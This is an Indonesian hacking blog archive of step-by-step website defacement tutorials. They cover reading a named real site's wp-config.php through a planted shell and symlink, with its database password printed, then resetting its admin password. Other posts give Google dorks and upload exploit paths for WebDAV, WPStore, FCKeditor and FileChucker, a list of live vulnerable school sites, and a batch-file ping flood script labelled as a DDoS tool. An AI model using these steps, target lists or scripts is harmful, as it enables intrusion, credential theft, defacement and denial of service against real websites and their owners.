0

Deface Website Dengan Metode Symlink

Jumat, 15 November 2013

Deface Website Dengan Metode Symlink

Halo sob (^_^), kali ini saya akan berbagi cara menggunakan Symlink.
Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target, saya tidak akan menjelaskan caranya, karena saya anggap agan sudah bisa mencari target sendiri (^_^).

Pertama masuk ke Shell yang sudah di tanam di web target.
lalu upload Sym.php ( Digunakan untuk SYMLINK ).
Klo belum punya silahkan Download Disini Sob (^_^)



















Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.

Selanjutnya akses / buka symlink yang telah agan upload.


















Lalu klik user & domain & symlink.


















Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".



















Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.

Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.


















Perhatikan baris ini :
define('DB_HOST', 'localhost');

DB NAME = thefussy_wrdp3

DB USER = thefussy_wrdp3

DB PASSWORD = CZyLRz1EuwSd

DB HOST = localhost
Diatas adalah informasi mengenai Akses Database MySQL.

Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.


















Klik koneksi MySQL.

















Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.

Jika di dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login.



















Lalu, saya klik "wp_user".



















Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja (^_^).
Agan buat password dalam bentuk MD5 Disini Sob (^_^).


Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a





















Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.

Berarti saya akan login dengan username admin dan password 121212.
Sekarang kita coba sob (^_^). 

















Saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin

Saya login & wauuuuu, kereennn sob (^_^).

Saya berhasil masuk (^_^).


















Jika sudah seperti ini terserah anda sob, kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak (^_^)

Selamat Mencoba (^_^).
1

Cara Mencari Target Vuln WebDav Dengan reverse IP


Cara Mencari Target Vuln WebDav Dengan reverse IP


dah lama gak post sayangnya laptop vga ane rusak jadi maklumi tampilan segede gajah :/
Ok langsung aja pasti dah tau webdav kan ?
kalo blum tau mending google dulu
kalo udah nih ane kasih lagi softwarenya
WebDav Rootkit Hmei7 Download
Langsung cari target yg vuln dengan dork berikut
Dork WebDav : 
inurl:/Hmei7.asp;.txt site:com
ntar kurang lebih seperti ini gambarnya



Copy URL tersebut dan Paste di
http://www.yougetsignal.com/tools/web-sites-on-web-server/
Untuk mengetahui domain yang 1 server dengan web tersebut
Seperti ini



Found 40 domains hosted on the same web server as file9.bemycio.com (67.40.161.74).Lumayan lah 40 domain iseng-2 berhadiah gan
Langsung Copas smua tuh web di notepad kyk gambar ini
ini main replace pada notepad biar kita mudah/cepat untuk menyusun setiap domain tersebut
Ntar tiggal enter-enter aja kyk gini
< SPASI > di hapus di ganti spasi beneran -_-"

Habis itu Save AS file dengan nama terserahagan.txt
Habis itu buka webdav dan load File yang agan save tadi contoh punya ane x.txt
Habis itu Klik open
Jangan lupa setting yang ada di kanan langsung di Setting biar langsung file .html bukan shell .asp;.txt lagi
nih contoh langsung ane klik SERANG !!

0

Cara Deface Web Dengan WPStore Themes Uploader

assalammualaikum wr.wb kali ini cara yang saya gunakan yaitu mengupload shell kita dengan exploit

1. Masukkan dork ini ke kotak pencarian google
inurl:/wp-content/themes/WPstore/
intext:"You have 0($0) item in your Shopping Bag"

2. Pilih salah satu dari hasil penelusuran

3. Masukkan exploit berikut /wp-content/themes/WPStore/upload/
Contoh: www.site.com/wp-content/themes/WPStore/upload/

4. Nanti akan muncul tampilan berikut




Anda klik "pilih file" untuk mengupload shell anda.

5. Tunggu beberapa saat

6. Jika shell sudah tertanam, anda buka shell anda dengan cara membuka url'nya
Contoh: www.site.com/wp-content/uploads/products_img/namashell.php

7. Anda hanya tinggal eksekusi saja, cari file index.php / index.html nya lalu rubah isinya dengan script deface anda

Semoga bermanfaat ^_^
5

cara hack / deface website sekolah ( sch.id )



assalammualaikum wr.wb / salam sejahtera Kali Ini saya akan share cara hack website sekolah anda ( sch.id ) terlebih dahulu anda persiapkan bahan nya. . .

Bahan:
- File txt (bikin di notepad)


Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?


Exploit:
/editor/filemanager/connectors/test.html

/editor/filemanager/connectors/uploadtest.html

PAKAI SALAH SATU EXPLOITNYA



1. Contoh:
http://blabla.sch.id/html/siswa.php
http://blabla.sch.id/html/alumni.php
http://blabla.sch.id/html/guru.php


2. Ganti jadi:
http://blabla.sch.id/editor/filemanager/connectors/uploadtest.html

3. Ganti ASP Jadi PHP

4. masukan file txt yang sudah disiapkan (open -> upload)

5. Hasilnya:  http://xxx.sch.id/userfiles/file/nama-file.txt



Nih, buat yang males nyari langsung aja yang sudah disiapkan:



live target :
http://sdia20.sch.id/simk/atk/attributes/fck/editor/filemanager/connectors/test.html
http://www.e-learning.smpbatikska.sch.id/editor/filemanager/connectors/test.html
http://sman1kotabaru.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html
http://www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html
0

deface dengan Remote File Upload Vulnerability

Jumat, 08 November 2013
assalammualaikum wr.wb kali ini saya akan meng-share cara deface dengan Remote File Upload Vulnerability langsung saja kita mulai

alat-alat yang di butuhkan :


- Google
- DORk
- BRAIN
- Exploit: /editor/editor/filemanager/upload/test.html
Dork :
• inurl:/editor/editor/filemanager/
• inurl:/HTMLEditor/editor/"

==========================================================================================
langkah - langkah
cari web di google  menggunakan dork :















pilih salah satu web yang ada saya ambi 1 web nya http://www.buraevo.ru/editor/editor/filemanager/upload/

setelah itu tampilan nya kurang lebih akan seperti ini












masukan exploit nya di url : www.TargetKamu.com/editor/editor/filemanager/upload/test.html
contoh web deface saya   : http://www.buraevo.ru/editor/editor/filemanager/upload/test.html

setelah di masukan exploit akan menjadi seperti ini














setelah itu ubah ASP menjadi PHP














jika  sudah di ganti klik chose file dan pilih script yang akan kamu upload

dan klik send it to server

jika tidak ada notif eror file mu berhasil di upload
tampilan nya akan menjadi seperti ini













setelah itu copy upload file url nya

www.TargetKamu.com/UserFiles/scriptmu.html

ini contoh DEMO nya link : http://www.buraevo.ru/UserFiles/hackkill1.blogspot.com.html
0

Deface Dengan Exploit FileChucker

Rabu, 06 November 2013

Deface Dengan Exploit FileChucker

Mungkin ini cara deface cukup mudah selain menggunakan aplikasi Webdav,mungkin in juga tutor deface sudah lama,tapi tidak apa-apa kan jika saya berbagi ilmu saya

bahan - bahan yg perlu di siapkan :

- Dork
- kesabaran
- your brain

========================================================================
Dork :
inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload
inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable

Langkah Pertama 1

Cari web korban menggunakan dork di google

















Pilih Salah satu web yang ada di laman itu kalian juga bisa mencari nya sampai laman yang terakhir
saya ambil 1 target yaitu : cceaman.com/cgi-bin/filechucker.cgi



















setelah itu tampilan nya akan menjadi seperti ini :


















klik choose file masukan script anda jika belum punya script silahkan cari di goole banyak

setelah itu klik begin upload


















tunggu hingga proses upload selesai
















jika sudah selesai tampilan nya akan seperti ini :


















copy tulisan yang ada di kolom URL To File

















setelah itu buka tab baru dan lihat hasil nya , Selesai mudah dan simple kan ?

sekian tutor deface dari saya untuk hari ini jika ada yang kurang jelas silahkan tanyakan di komentar ^_^
20

Cara Membuat Tool Hacker Sederhana Menggunakan Notepade.

Senin, 04 November 2013
hai sobat blogger...
pada kesempatan kali ini hackkill1 bagi2 ilmu atau sharing yang lebih tepatnya kali ya ..?? sharing ilmu maksud nya....

ahg.. pada kali ini hackkill1 memposting Cara Membuat Tool Hacker Sederhana Menggunakan Notepade.

Pada kali ini kita akan membuat serangan Ddos Attack...

apa itu Ddos Attack adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menhabiskan sumber ( resource ) yang di miliki oleh komputer tersebut. sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar, sehingga secara tidak langsung mencegah pengguna lain untu memperoleh akses layanan dari komputer yang di serang tersebut..

uda dulu ahg penjelasan tentang Ddos Attack nya..
langsung saja kita ke cara pembuatan Ddos Attack..

yang perlu di persiapkan adalah :
1. PC / Laptop
2. Programe Notepade. ( sudah ada dalam windows kita semua )

cara membuat nya adalah :
1. buka notepade sobat semua..
2. copy code script di bawah ini kedalam notepade sobat.
ingat : jangan mengganti script di bawah ini 

@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server   +
echo + Author : hackkill1             +
echo + Visite : hackkill1.blogspot.com+
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS


3. nama file terserah sobat  ( simpan dengan extensi .bat )
4. contohnya Ddos.bat
5. jalankan file dengan cara double klik.

cara pakainya :
- pada menu server - target sobat dapat memasukan ip target sobat
- masukan alamat web yang ingin Ddos

selamat mencoba :D